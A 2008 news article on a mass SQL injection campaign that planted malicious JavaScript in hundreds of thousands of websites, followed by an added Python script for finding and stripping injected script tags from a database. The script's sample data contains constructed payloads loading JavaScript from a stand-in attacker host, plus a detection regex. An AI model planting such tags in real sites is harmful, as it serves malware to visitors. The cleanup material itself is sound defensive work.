SQL injection attack infects hundreds of thousands of websites

By Michael S. Mimoso, Editor, Information Security magazine
30 Apr 2008 | SearchSecurity.com

Chinese hackers have conducted successful SQL injection attacks on hundreds of thousands of websites during the past 10 days, culling their targets from search engines.

Normally, SQL injection attacks are targeted attacks, one IP address at a time. The closest attack on this scale would be the SAMY worm attack on the MySpace.com domain, but that was against just one domain.

The attackers are using simple search engine queries to find massive lists of ASP or PHP sites, for example, to determine injection parameters, and then automating their attacks. They are taking advantage of a feature of Microsoft's SQL Server database server that allows multiple SQL statements to be sent in the same HTTP request. Other databases, such as MySQL or Postgres, don't support this functionality.

The attack is a complicated SQL injection, said Jeremiah Grossman, a Web application security expert and chief technology officer of White Hat Security. Grossman said the injection is nearly a paragraph in size, and fully encoded, enabling it to elude intrusion detection systems. Part of it contains Chinese characters and a leet-treatment of the Chinese word for hello, ni hao (n1 ha0).

The SQL injection exploit loops through database tables, loading malicious JavaScript everywhere it can, Grossman said, and ultimately infects browsers with malware via a Web page iFrame that loads content such as Trojans from various hacker-controlled sites.

Grossman said he knows of one site loading a Trojan that tries to steal World of Warcraft passwords. But the real danger is that these sites have essentially been backdoored, and the payloads can be swapped out at any time.

"They're blindly tossing SQL injections at sites and getting a high success rate. They're upping the game," Grossman said. "This is a new level of sophistication."

Authorities have asked Chinese ISPs to shut down these sites, but that doesn't hamper the attack methodology; attackers can merely move to new domains.

"It's difficult for site owners to tell if their sites have been exploited," Grossman said. "If they look into their own site, they can tell whether malware is being pulled in. If it isn't, it could be because the hacker-controlled site is down. They'll think they're clean, and tomorrow, they may not be."

Cleanup is a chore. Site owners either have to search their database tables manually, row by row and table by table, looking for the offending code and removing it, or restore the database from a backup if one is available.
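As an added illustration of that cleanup step (not code from the article or from any product it mentions), the following Python script enumerates every character-typed column in every table, finds cells carrying the kind of injected remote script tag the article describes, and strips them in place. It uses an in-memory SQLite database as a constructed stand-in for the affected site's database; the table contents and the attacker.example host are assumed sample values.

```python
import re
import sqlite3

# Injected payload shape from the article: a <script> tag loading remote JavaScript (host is constructed).
INJECTED_SCRIPT = re.compile(
    r'<script\s+src=["\']?https?://[^"\'>\s]+["\']?\s*>\s*</script>', re.IGNORECASE)


def build_sample_db():
    """Constructed in-memory stand-in for a site database with infected rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT);
        INSERT INTO products (name, description, price) VALUES ('Widget', 'A plain widget', 9.99),
          ('Gadget<script src="http://attacker.example/ni.js"></script>',
           'Handy<script src="http://attacker.example/ni.js"></script>', 19.99);
        INSERT INTO news (title, body) VALUES ('Welcome', 'Nothing injected here'),
          ('Sale', 'Big sale<script src=http://attacker.example/ni.js></script> this week');
    """)
    return conn


def text_columns(conn):
    """Yield (table, column) for every character-typed column in the schema
    (on SQL Server the equivalent list comes from INFORMATION_SCHEMA.COLUMNS)."""
    for (table,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        for _, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(t in ctype.upper() for t in ("CHAR", "TEXT")):
                yield table, col


def find_infected_rows(conn):
    """Return (table, column, rowid, snippet) for every injected tag found."""
    hits = []
    for table, col in text_columns(conn):
        # Identifiers come from the catalog, not from users; values stay bound parameters.
        rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                            ("%<script%",)).fetchall()
        for rowid, value in rows:
            hits.extend((table, col, rowid, m.group(0)) for m in INJECTED_SCRIPT.finditer(value))
    return hits


def clean_infected_rows(conn):
    """Strip every injected tag in place; return the number of cells rewritten."""
    cells = {(t, c, r) for t, c, r, _ in find_infected_rows(conn)}
    for table, col, rowid in cells:
        (value,) = conn.execute(f'SELECT "{col}" FROM "{table}" WHERE rowid=?', (rowid,)).fetchone()
        conn.execute(f'UPDATE "{table}" SET "{col}"=? WHERE rowid=?',
                     (INJECTED_SCRIPT.sub("", value), rowid))
    conn.commit()
    return len(cells)
```

Run `find_infected_rows` first and review the reported cells before calling `clean_infected_rows`, since a match-and-strip pass rewrites live content and, as the article notes, a backup restore may be the safer route when one exists.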

"If you use the 80-20 rule, it could be months before we see this cleaned up," Grossman said. "If the hacker-controlled domains are down at the moment, you might be owned, but not being exploited."
